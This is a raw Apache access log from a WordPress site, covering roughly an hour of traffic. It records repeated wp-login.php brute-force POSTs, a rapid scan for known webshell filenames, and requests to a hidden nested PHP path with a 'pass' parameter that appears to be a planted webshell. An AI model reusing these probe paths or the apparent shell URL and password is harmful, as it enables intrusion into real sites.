45.61.187.50 - - [02/Sep/2026:02:34:04 -0500] "GET /media/system/js/core.js HTTP/1.1" 500 - "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.2 Safari/605.1.15"
45.61.187.50 - - [02/Sep/2026:02:34:06 -0500] "GET /media/jui/js/bootstrap.min.js HTTP/1.1" 500 2704 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36"
45.61.187.50 - - [02/Sep/2026:02:34:08 -0500] "GET /media/vendor/jquery/js/jquery.min.js?3.6.0 HTTP/1.1" 500 2704 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.2 Safari/605.1.15"
45.61.187.50 - - [02/Sep/2026:02:34:10 -0500] "GET / HTTP/1.1" 500 2704 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.2 Safari/605.1.15"
157.230.229.93 - - [02/Sep/2026:02:36:17 -0500] "POST /wp-login.php HTTP/1.1" 500 - "-" "Mozilla/5.0"
157.230.229.93 - - [02/Sep/2026:02:38:09 -0500] "POST /wp-login.php HTTP/1.1" 500 - "-" "Mozilla/5.0"
157.230.229.93 - - [02/Sep/2026:02:39:46 -0500] "POST /wp-login.php HTTP/1.1" 500 - "-" "Mozilla/5.0"
157.230.229.93 - - [02/Sep/2026:02:42:40 -0500] "POST /wp-login.php HTTP/1.1" 500 - "-" "Mozilla/5.0"
157.230.229.93 - - [02/Sep/2026:02:49:37 -0500] "POST /wp-login.php HTTP/1.1" 500 - "-" "Mozilla/5.0"
157.230.229.93 - - [02/Sep/2026:02:56:33 -0500] "POST /wp-login.php HTTP/1.1" 500 - "-" "Mozilla/5.0"
146.59.57.40 - - [02/Sep/2026:02:59:18 -0500] "GET /wp-includes/sitemaps/zlumxjk/mafhkzn/sf1ypjr/index.php?pass=K6hkO2zwH3E HTTP/1.1" 200 5704 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
146.59.57.40 - - [02/Sep/2026:02:59:35 -0500] "GET /wp-includes/sitemaps/zlumxjk/mafhkzn/sf1ypjr/index.php?pass=K6hkO2zwH3E HTTP/1.1" 200 5704 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/152.0.0.0 Safari/537.36"
146.59.57.40 - - [02/Sep/2026:02:59:35 -0500] "GET /favicon.ico HTTP/1.1" 500 2704 "https://effefe.com/wp-includes/sitemaps/zlumxjk/mafhkzn/sf1ypjr/index.php?pass=K6hkO2zwH3E" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/152.0.0.0 Safari/537.36"
146.59.57.40 - - [02/Sep/2026:02:59:40 -0500] "POST /wp-includes/sitemaps/zlumxjk/mafhkzn/sf1ypjr/index.php?pass=K6hkO2zwH3E HTTP/1.1" 200 5863 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
57.131.131.18 - - [02/Sep/2026:03:00:05 -0500] "GET / HTTP/1.1" 500 2704 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_7 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.7.5 Mobile/15E148 Safari/604.1"
157.230.229.93 - - [02/Sep/2026:03:03:28 -0500] "POST /wp-login.php HTTP/1.1" 500 - "-" "Mozilla/5.0"
157.230.229.93 - - [02/Sep/2026:03:10:28 -0500] "POST /wp-login.php HTTP/1.1" 500 - "-" "Mozilla/5.0"
157.55.39.49 - - [02/Sep/2026:03:17:12 -0500] "GET /fluid-shop/cv.johanblanco.com HTTP/1.1" 403 199 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
157.230.229.93 - - [02/Sep/2026:03:17:33 -0500] "POST /wp-login.php HTTP/1.1" 500 - "-" "Mozilla/5.0"
152.228.236.214 - - [02/Sep/2026:03:21:10 -0500] "GET / HTTP/1.1" 500 2704 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_7 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/26.2 Mobile/15E148 Safari/604.1"
114.119.158.46 - - [02/Sep/2026:03:21:55 -0500] "GET /wp-content/uploads/2023/03/w-architecture-slider-1-opt.jpg HTTP/1.1" 200 157807 "http://www.effefe.com?id=445776" "Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (HTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)"
195.3.220.7 - - [02/Sep/2026:03:22:02 -0500] "GET /a.php HTTP/1.1" 500 2704 "-" "Mozilla/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36"
195.3.220.7 - - [02/Sep/2026:03:22:04 -0500] "GET /wp-content/uploads/elementor/222.php HTTP/1.1" 500 2704 "-" "Mozilla/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36"
195.3.220.7 - - [02/Sep/2026:03:22:04 -0500] "GET /.well-known/acme-challenge/wp-firewall.php HTTP/1.1" 404 16 "-" "Mozilla/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36"
195.3.220.7 - - [02/Sep/2026:03:22:06 -0500] "GET /wp-content/uploads/222.php HTTP/1.1" 500 2704 "-" "Mozilla/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36"
195.3.220.7 - - [02/Sep/2026:03:22:08 -0500] "GET /wp-content/uploads/2026/222.php HTTP/1.1" 500 2704 "-" "Mozilla/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36"
195.3.220.7 - - [02/Sep/2026:03:22:10 -0500] "GET /.well-known/acme-challenge/222.php HTTP/1.1" 404 16 "-" "Mozilla/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36"
195.3.220.7 - - [02/Sep/2026:03:22:10 -0500] "GET /simple.php HTTP/1.1" 500 2704 "-" "Mozilla/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36"
195.3.220.7 - - [02/Sep/2026:03:22:11 -0500] "GET /.tmb/worksec.php HTTP/1.1" 500 2704 "-" "Mozilla/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36"
195.3.220.7 - - [02/Sep/2026:03:22:13 -0500] "GET /wp-content/plugins/fix/up.php HTTP/1.1" 500 2704 "-" "Mozilla/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36"
195.3.220.7 - - [02/Sep/2026:03:22:15 -0500] "GET /wp-content/index.php HTTP/1.1" 200 - "-" "Mozilla/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36"
195.3.220.7 - - [02/Sep/2026:03:22:15 -0500] "GET /wp-content/plugins/pwnd/pwnd.php HTTP/1.1" 500 2704 "-" "Mozilla/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36"
195.3.220.7 - - [02/Sep/2026:03:22:17 -0500] "GET /wp-content/plugins/pwnd-1/pwnd.php HTTP/1.1" 500 2704 "-" "Mozilla/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36"
195.3.220.7 - - [02/Sep/2026:03:22:19 -0500] "GET /worksec.php HTTP/1.1" 500 2704 "-" "Mozilla/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36"
195.3.220.7 - - [02/Sep/2026:03:22:21 -0500] "GET /wp-content/worksec.php HTTP/1.1" 500 2704 "-" "Mozilla/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36"
195.3.220.7 - - [02/Sep/2026:03:22:23 -0500] "GET /wp-content/themes/twentynineteen/404.php HTTP/1.1" 500 - "-" "Mozilla/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36"
195.3.220.7 - - [02/Sep/2026:03:22:25 -0500] "GET /wp-content/themes/twentytwentyone/404.php HTTP/1.1" 500 - "-" "Mozilla/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36"
195.3.220.7 - - [02/Sep/2026:03:22:26 -0500] "GET /wp-content/cache/index.php HTTP/1.1" 500 2704 "-" "Mozilla/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36"
195.3.220.7 - - [02/Sep/2026:03:22:28 -0500] "GET /wp-content/index.php HTTP/1.1" 200 - "-" "Mozilla/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36"
195.3.220.7 - - [02/Sep/2026:03:22:29 -0500] "GET /wp-content/languages/index.php HTTP/1.1" 500 2704 "-" "Mozilla/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36"
195.3.220.7 - - [02/Sep/2026:03:22:30 -0500] "GET /wp-content/plugins/index.php HTTP/1.1" 200 - "-" "Mozilla/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36"
195.3.220.7 - - [02/Sep/2026:03:22:31 -0500] "GET /wp-content/themes/index.php HTTP/1.1" 200 - "-" "Mozilla/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36"
195.3.220.7 - - [02/Sep/2026:03:22:31 -0500] "GET /wp-content/upgrade/index.php HTTP/1.1" 500 2704 "-" "Mozilla/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36"
195.3.220.7 - - [02/Sep/2026:03:22:33 -0500] "GET /wp-content/uploads/index.php HTTP/1.1" 500 2704 "-" "Mozilla/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36"
195.3.220.7 - - [02/Sep/2026:03:22:34 -0500] "GET /wp-admin/index.php HTTP/1.1" 500 - "-" "Mozilla/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36"
195.3.220.7 - - [02/Sep/2026:03:22:36 -0500] "GET /wp-content/themes/Divi/404.php HTTP/1.1" 500 2704 "-" "Mozilla/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36"
195.3.220.7 - - [02/Sep/2026:03:22:38 -0500] "GET /wp-admin/index.php HTTP/1.1" 500 - "-" "Mozilla/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36"
195.3.220.7 - - [02/Sep/2026:03:22:40 -0500] "GET /wp-admin/css/index.php HTTP/1.1" 500 2704 "-" "Mozilla/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36"
195.3.220.7 - - [02/Sep/2026:03:22:43 -0500] "GET /wp-admin/includes/index.php HTTP/1.1" 500 2704 "-" "Mozilla/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36"
195.3.220.7 - - [02/Sep/2026:03:22:44 -0500] "GET /wp-admin/js/index.php HTTP/1.1" 500 2704 "-" "Mozilla/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36"
195.3.220.7 - - [02/Sep/2026:03:22:47 -0500] "GET /wp-admin/maint/index.php HTTP/1.1" 500 2704 "-" "Mozilla/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36"
195.3.220.7 - - [02/Sep/2026:03:22:41 -0500] "GET /wp-admin/images/index.php HTTP/1.1" 500 2704 "-" "Mozilla/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36"
195.3.220.7 - - [02/Sep/2026:03:22:49 -0500] "GET /wp-admin/network/index.php HTTP/1.1" 302 - "-" "Mozilla/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36"
157.90.185.123 - - [02/Sep/2026:03:22:51 -0500] "POST /wp-admin/admin-ajax.php?action=as_async_request_queue_runner&nonce=6cf985476b HTTP/1.1" 500 184 "-" "WordPress/7.1; https://effefe.com"
157.90.185.123 - - [02/Sep/2026:03:22:52 -0500] "POST /wp-cron.php?doing_wp_cron=1788337372.5372459888458251953125 HTTP/1.1" 200 - "-" "WordPress/7.1; https://effefe.com"
195.3.220.7 - - [02/Sep/2026:03:22:53 -0500] "GET /wp-login.php?redirect_to=https%3A%2F%2Feffefe.com%2Fwp-admin%2Fnetwork%2Findex.php&reauth=1 HTTP/1.1" 500 - "-" "Mozilla/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36"
195.3.220.7 - - [02/Sep/2026:03:22:57 -0500] "GET /wp-admin/user/index.php HTTP/1.1" 500 - "-" "Mozilla/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36"
114.119.154.166 - - [02/Sep/2026:03:23:50 -0500] "GET /home/ HTTP/1.1" 500 2704 "https://effefe.com/home/" "Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (HTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)"
157.230.229.93 - - [02/Sep/2026:03:24:35 -0500] "POST /wp-login.php HTTP/1.1" 500 - "-" "Mozilla/5.0"
146.190.49.107 - - [02/Sep/2026:03:24:51 -0500] "GET /portfolio/pavone/ HTTP/1.1" 500 2704 "https://www.google.com/search?q=effefe" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.0.0 Safari/537.36"
114.119.142.39 - - [02/Sep/2026:03:26:31 -0500] "GET /?id=322640.html HTTP/1.1" 500 2704 "http://www.czcrcgas.com/zhaopin/533.html" "Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (HTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)"
157.230.229.93 - - [02/Sep/2026:03:31:42 -0500] "POST /wp-login.php HTTP/1.1" 200 7596 "-" "Mozilla/5.0"
157.90.185.123 - - [02/Sep/2026:03:31:45 -0500] "POST /wp-cron.php?doing_wp_cron=1788337905.1608109474182128906250 HTTP/1.1" 200 - "-" "WordPress/7.1; https://effefe.com"
114.119.148.64 - - [02/Sep/2026:03:32:02 -0500] "GET /?id=677993.html HTTP/1.1" 500 188 "http://www.ziasteelmills.com/www-com/ziast-gdasky-ll8.html?27394.html" "Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (HTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)"
114.119.154.166 - - [02/Sep/2026:03:32:48 -0500] "GET /?id=241026.html HTTP/1.1" 500 188 "http://www.ziasteelmills.com/www-com/ziast-thedealblast-ll8.html" "Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (HTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)"
114.119.142.39 - - [02/Sep/2026:03:34:37 -0500] "GET /?id=310650 HTTP/1.1" 500 188 "http://www.idbcn.net/zhaopin/4871.html" "Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (HTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)"
114.119.158.46 - - [02/Sep/2026:03:36:22 -0500] "GET /?id=132261 HTTP/1.1" 500 188 "http://www.boomint.cn/100.html" "Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (HTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)"
114.119.148.64 - - [02/Sep/2026:03:37:07 -0500] "GET /?id=933541.html HTTP/1.1" 500 188 "http://www.ziasteelmills.com/www-com/ziast-sstcardservices-ll8.html" "Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (HTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)"
3.211.181.86 - - [02/Sep/2026:03:38:18 -0500] "GET /robots.txt HTTP/1.1" 500 2704 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
157.230.229.93 - - [02/Sep/2026:03:38:48 -0500] "POST /wp-login.php HTTP/1.1" 500 - "-" "Mozilla/5.0"
114.119.144.15 - - [02/Sep/2026:03:39:11 -0500] "GET /?id=867070 HTTP/1.1" 500 188 "http://baisentong.com/tag/75580/" "Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (HTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)"
114.119.135.63 - - [02/Sep/2026:03:39:17 -0500] "GET /?id=520512 HTTP/1.1" 500 - "http://www.effefe.com?id=520512" "Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (HTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)"
114.119.135.63 - - [02/Sep/2026:03:41:24 -0500] "GET /?id=222317.html HTTP/1.1" 500 - "http://www.effefe.com?id=222317.html" "Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (HTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)"
54.38.196.24 - - [02/Sep/2026:03:41:59 -0500] "GET / HTTP/1.1" 500 2704 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 26_6 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Mobile/23G71 Twitter for iPhone/12.19.1"
114.119.154.166 - - [02/Sep/2026:03:43:46 -0500] "GET /?id=712263.html HTTP/1.1" 500 2704 "http://www.czcrcgas.com/zhaopin/2595.html" "Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (HTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)"
114.119.154.166 - - [02/Sep/2026:03:45:24 -0500] "GET /?id=875849.html HTTP/1.1" 500 2704 "http://www.czcrcgas.com/zhaopin/2541.html" "Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (HTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)"
157.230.229.93 - - [02/Sep/2026:03:45:52 -0500] "POST /wp-login.php HTTP/1.1" 500 - "-" "Mozilla/5.0"
114.119.152.47 - - [02/Sep/2026:03:48:18 -0500] "GET /?id=625745 HTTP/1.1" 500 188 "http://www.ziasteelmills.com/www-com/ziast-sznfs-ll8.html" "Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (HTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)"
157.230.229.93 - - [02/Sep/2026:03:52:53 -0500] "POST /wp-login.php HTTP/1.1" 500 - "-" "Mozilla/5.0"
114.119.158.46 - - [02/Sep/2026:03:53:19 -0500] "GET /?id=960232 HTTP/1.1" 500 188 "http://www.ziasteelmills.com/www-com/ziast-modaswim-ll8.html?34150.html" "Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (HTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)"
114.119.154.166 - - [02/Sep/2026:03:54:13 -0500] "GET /three-columns-portfolio/ HTTP/1.1" 500 2704 "https://effefe.com/three-columns-portfolio/" "Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (HTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)"
114.119.137.116 - - [02/Sep/2026:03:54:16 -0500] "GET /?id=540837.html HTTP/1.1" 500 - "http://ffazf.com/2021/06/13/%E7%A7%A6%E6%97%B6%E6%98%8E%E6%9C%88%E6%89%8B%E6%B8%B8%E4%BA%BA%E7%89%A9%E5%A4%A7%E5%85%A8%E5%9B%BE%E7%89%87%E5%A4%A7%E5%85%A8-%E5%85%89%E9%81%87%E5%BF%83%E4%B9%8B%E7%81%B5%E4%BD%8D%E7%BD%AE%E5%9C%A8/" "Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (HTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)"
120.133.60.156 - - [02/Sep/2026:03:54:36 -0500] "POST /wp-login.php HTTP/1.1" 500 - "https://effefe.com/wp-login.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36"
114.119.135.63 - - [02/Sep/2026:03:55:11 -0500] "GET /?id=988709 HTTP/1.1" 500 188 "http://www.boomint.cn/142.html" "Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (HTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)"
114.119.148.64 - - [02/Sep/2026:03:56:20 -0500] "GET /contact-us/ HTTP/1.1" 500 2704 "https://www.effefe.com/contact" "Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (HTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)"
114.119.152.47 - - [02/Sep/2026:03:56:50 -0500] "GET /?id=325890.html HTTP/1.1" 500 188 "http://www.ziasteelmills.com/www-com/ziast-gzszp-ll8.html" "Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (HTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)"
114.119.148.64 - - [02/Sep/2026:03:57:37 -0500] "GET /?id=595299 HTTP/1.1" 500 2704 "http://www.yijielace.com/zhaopin/4501.html" "Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (HTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)"
114.119.144.15 - - [02/Sep/2026:03:57:53 -0500] "GET /?id=434735.html HTTP/1.1" 500 2704 "http://www.czcrcgas.com/zhaopin/3381.html" "Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (HTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)"
114.119.144.15 - - [02/Sep/2026:03:57:56 -0500] "GET /?id=624411.html HTTP/1.1" 500 188 "http://www.ziasteelmills.com/www-com/ziast-teaganalex-ll8.html" "Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (HTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)"
114.119.148.64 - - [02/Sep/2026:03:58:28 -0500] "GET /about-us/ HTTP/1.1" 500 2704 "https://effefe.com/about-us/" "Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (HTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)"
114.119.144.15 - - [02/Sep/2026:03:58:51 -0500] "GET /?id=103945.html HTTP/1.1" 500 188 "http://www.ziasteelmills.com/www-com/ziast-lskyk-2-ll8.html?17512.xml" "Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (HTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)"
157.230.229.93 - - [02/Sep/2026:03:59:59 -0500] "POST /wp-login.php HTTP/1.1" 500 - "-" "Mozilla/5.0"
114.119.144.15 - - [02/Sep/2026:04:00:39 -0500] "GET /?id=933541.html HTTP/1.1" 500 2704 "https://effefe.com/?id=933541.html" "Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (HTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)"
159.65.248.34 - - [02/Sep/2026:04:01:54 -0500] "GET / HTTP/1.1" 500 - "-" "Mozilla/5.0 (X11; Linux x86_64; rv:142.0) Gecko/20100101 Firefox/142.0"
159.65.248.34 - - [02/Sep/2026:04:01:55 -0500] "GET /favicon.ico HTTP/1.1" 500 188 "http://effefe.com/" "Mozilla/5.0 (X11; Linux x86_64; rv:142.0) Gecko/20100101 Firefox/142.0"
159.65.248.34 - - [02/Sep/2026:04:01:57 -0500] "GET / HTTP/1.1" 500 2704 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/142.0.0.0 Safari/537.36"
159.65.248.34 - - [02/Sep/2026:04:02:02 -0500] "GET /favicon.ico HTTP/1.1" 500 2704 "https://effefe.com/" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/142.0.0.0 Safari/537.36"
157.90.185.123 - - [02/Sep/2026:04:02:31 -0500] "POST /wp-cron.php?doing_wp_cron=1788339751.5922489166259765625000 HTTP/1.1" 200 - "-" "WordPress/7.1; https://effefe.com"
114.119.148.64 - - [02/Sep/2026:04:02:29 -0500] "GET /?id=304095 HTTP/1.1" 301 - "http://www.ziasteelmills.com/www-com/ziast-germainekeller-ll8.html" "Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (HTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)"
114.119.148.64 - - [02/Sep/2026:04:02:32 -0500] "GET /?id=304095 HTTP/1.1" 200 208302 "http://www.ziasteelmills.com/www-com/ziast-germainekeller-ll8.html" "Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (HTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)"
